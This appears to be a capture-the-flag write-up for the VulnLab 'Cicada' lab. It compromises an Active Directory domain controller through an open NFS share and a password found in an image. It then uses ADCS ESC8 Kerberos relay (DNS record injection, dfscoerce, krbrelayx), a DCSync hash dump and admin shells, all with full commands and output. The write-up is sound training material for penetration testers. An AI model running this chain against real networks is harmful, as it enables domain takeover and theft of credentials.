VulnLab Cicada
VulnLab Cicada
VulnLab Cicada
Cicada
Recon
1
2
3
4
└─$ rustscan -g -r 1-65535 -a 10.10.97.220
10.10.97.220 -> [53,80,88,111,135,139,389,445,464,593,636,2049,3269,3268,3389,5985,9389]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
└─$ nmap -sC -sV -p53,80,88,111,135,139,389,445,464,593,636,2049,3269,3268,3389,5985,9389 10.10.97.220
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 00:13 +06
Nmap scan report for 10.10.97.220
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-15 18:12:26Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
2049/tcp open nlockmgr 1-4 (RPC #100021)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Not valid before: 2025-02-14T18:10:41
|_Not valid after: 2025-08-16T18:10:41
|_ssl-date: 2025-02-15T18:13:51+00:00; -1m24s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC-JPQ225; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1m24s, deviation: 0s, median: -1m24s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-02-15T18:13:12
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 153.51 seconds
Root
We see NFS, which contains directory /profiles
1
2
3
└─$ showmount -e cicada.vl
Export list for cicada.vl:
/profiles (everyone)
We mount it and find user homes
1
└─$ sudo mount -t nfs cicada.vl:/profiles $PWD/share
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
└─$ tree -L 2 share
share
├── Administrator
│ ├── Documents
│ └── vacation.png
├── Daniel.Marshall
├── Debra.Wright
├── Jane.Carter
├── Jordan.Francis
├── Joyce.Andrews
├── Katie.Ward
├── Megan.Simpson
├── Richard.Gibbons
├── Rosie.Powell
│ ├── Documents
│ └── marketing.png
└── Shirley.West
14 directories, 2 files
Rosie.Powell has password in the picture
1
└─$ sudo cp share/Rosie.Powell/marketing.png .
1
└─$ sudo eog marketing.png
If we try creds, we receive message STATUS_NOT_SUPPORTED, meaning NTLM is not enabled
1
2
3
└─$ nxc smb cicada.vl -u 'rosie.powell' -p '<REDACTED>'
SMB 10.10.97.220 445 10.10.97.220 [*] x64 (name:10.10.97.220) (domain:10.10.97.220) (signing:True) (SMBv1:False)
SMB 10.10.97.220 445 10.10.97.220 [-] 10.10.97.220\rosie.powell:<REDACTED> STATUS_NOT_SUPPORTED
So we authenticate using kerberos and the creds are valid
1
2
3
└─$ nxc smb dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k
SMB dc-jpq225.cicada.vl 445 dc-jpq225 [*] x64 (name:dc-jpq225) (domain:cicada.vl) (signing:True) (SMBv1:False)
SMB dc-jpq225.cicada.vl 445 dc-jpq225 [+] cicada.vl\rosie.powell:<REDACTED>
There’s ADCS, which is probably related to port 80
1
2
3
4
5
6
└─$ nxc ldap dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k -M adcs
LDAP dc-jpq225.cicada.vl 389 DC-JPQ225 [*] None (name:DC-JPQ225) (domain:cicada.vl)
LDAP dc-jpq225.cicada.vl 389 DC-JPQ225 [+] cicada.vl\rosie.powell:<REDACTED>
ADCS dc-jpq225.cicada.vl 389 DC-JPQ225 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS dc-jpq225.cicada.vl 389 DC-JPQ225 Found PKI Enrollment Server: DC-JPQ225.cicada.vl
ADCS dc-jpq225.cicada.vl 389 DC-JPQ225 Found CN: cicada-DC-JPQ225-CA
Let’s get ticket and use it with certipy
1
2
3
4
└─$ getTGT.py cicada.vl/rosie.powell:'<REDACTED>' -dc-ip dc-jpq225.cicada.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in rosie.powell.ccache
We find that ADCS is vulnerable to ESC8
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
└─$ KRB5CCNAME=rosie.powell.ccache certipy find -k -no-pass -debug -dc-ip dc-jpq225.cicada.vl -ns 10.10.97.220 -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Domain retrieved from CCache: CICADA.VL
<SNIP>
Certificate Authorities
0
CA Name : cicada-DC-JPQ225-CA
DNS Name : DC-JPQ225.cicada.vl
Certificate Subject : CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl
Certificate Serial Number : 491BDD500EA006974F23E975392B6C4E
Certificate Validity Start : 2025-02-15 18:06:51+00:00
Certificate Validity End : 2525-02-15 18:16:51+00:00
Web Enrollment : Enabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : CICADA.VL\Administrators
Access Rights
ManageCertificates : CICADA.VL\Administrators
CICADA.VL\Domain Admins
CICADA.VL\Enterprise Admins
ManageCa : CICADA.VL\Administrators
CICADA.VL\Domain Admins
CICADA.VL\Enterprise Admins
Enroll : CICADA.VL\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates : [!] Could not find any certificate templates
The MachineAccountQuota is set to 10, so we can create/join computer
1
2
3
4
5
└─$ nxc ldap dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k -M maq
LDAP dc-jpq225.cicada.vl 389 DC-JPQ225 [*] None (name:DC-JPQ225) (domain:cicada.vl)
LDAP dc-jpq225.cicada.vl 389 DC-JPQ225 [+] cicada.vl\rosie.powell:<REDACTED>
MAQ dc-jpq225.cicada.vl 389 DC-JPQ225 [*] Getting the MachineAccountQuota
MAQ dc-jpq225.cicada.vl 389 DC-JPQ225 MachineAccountQuota: 10
According to multiple blogs, we can perform kerberos relay:
- https://www.synacktiv.com/en/publications/relaying-kerberos-over-smb-using-krbrelayx
- https://www.tiraniddo.dev/2024/04/relaying-kerberos-authentication-from.html
There is a way to do it from Windows machine and it requires MachineAccountQuota, but we will do it from linux so we don’t need that. The only thing we need is to to create A record pointing to our box, which has to have the form described in blogs. Knowing that by default all authenticated users can create A record if it doesn’t exist, we can abuse that:
1
2
3
└─$ bloodyAD.py --host dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k -d 'cicada.vl' add dnsRecord 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.8.4.147
[+] dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
For coercing, use dfscoerce.py (feel free to try other coercion methods)
1
2
3
4
5
6
7
8
9
10
11
12
└─$ KRB5CCNAME=rosie.powell.ccache python3 dfscoerce.py -k -no-pass 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' dc-jpq225.cicada.vl
[-] Connecting to ncacn_np:dc-jpq225.cicada.vl[\PIPE\netdfs]
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot!
NetrDfsRemoveStdRoot
ServerName: 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA\x00'
RootShare: 'test\x00'
ApiFlags: 1
DFSNM SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.
Make sure to pull latest update for krbrelayx and start it before coercing
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
└─$ krbrelayx.py -t 'http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp' --adcs --template DomainController -v 'DC-JPQ225$'
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.97.220
[*] HTTP server returned status code 200, treating as a successful login
[*] SMBD: Received connection from 10.10.97.220
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] Skipping user DC-JPQ225$ since attack was already performed
[*] GOT CERTIFICATE! ID 20
[*] Writing PKCS#12 certificate to ./DC-JPQ225$.pfx
[*] Certificate successfully written to file
We got our certificate, so now let’s get ticket for domain controller
1
2
3
4
5
6
7
8
9
10
11
12
└─$ gettgtpkinit.py -cert-pfx 'DC-JPQ225$.pfx' 'cicada.vl/DC-JPQ225$' DC-JPQ225.ccache
2025-02-16 02:25:54,246 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-02-16 02:25:54,540 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-02-16 02:26:05,870 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-02-16 02:26:05,870 minikerberos INFO c326fc1b13c7afc395e785808254612a8948420d28e3f1b481e8ed7a8b6c60d9
INFO:minikerberos:c326fc1b13c7afc395e785808254612a8948420d28e3f1b481e8ed7a8b6c60d9
2025-02-16 02:26:05,872 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
DCSync using the ticket
1
2
3
4
5
6
7
8
└─$ KRB5CCNAME=DC-JPQ225.ccache secretsdump.py -k -no-pass DC-JPQ225.cicada.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>
Configure krb5.conf to be able to use evil-winrm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─$ cat krb5.conf
[libdefaults]
default_realm = CICADA.VL
dns_lookup_realm = true
dns_lookup_kdc = true
[realms]
CICADA.VL = {
kdc = dc-jpq225.cicada.vl
admin_server = dc-jpq225.cicada.vl
default_domain = dc-jpq225.cicada.vl
}
[domain_realm]
cicada.vl = CICADA.VL
.cicada.vl = CICADA.VL
Then use set env variables and connect
1
2
3
4
5
6
7
8
9
10
11
12
└─$ KRB5_CONFIG=krb5.conf KRB5CCNAME=administrator@DC-JPQ225.cicada.vl.ccache evil-winrm -i DC-JPQ225.cicada.vl -u administrator -r CICADA.VL
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: User is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\dc-jpq225\profiles$\Administrator\Documents>
Or simply wmiexec.py
1
2
3
4
5
6
7
8
└─$ KRB5CCNAME=administrator@DC-JPQ225.cicada.vl.ccache wmiexec.py -k -no-pass DC-JPQ225.cicada.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type \users\administrator\desktop\root.txt
https://api.vulnlab.com/api/v1/share?id=56b13afc-3db2-468d-9536-dd298b39aab4
This post is licensed under CC BY 4.0 by the author.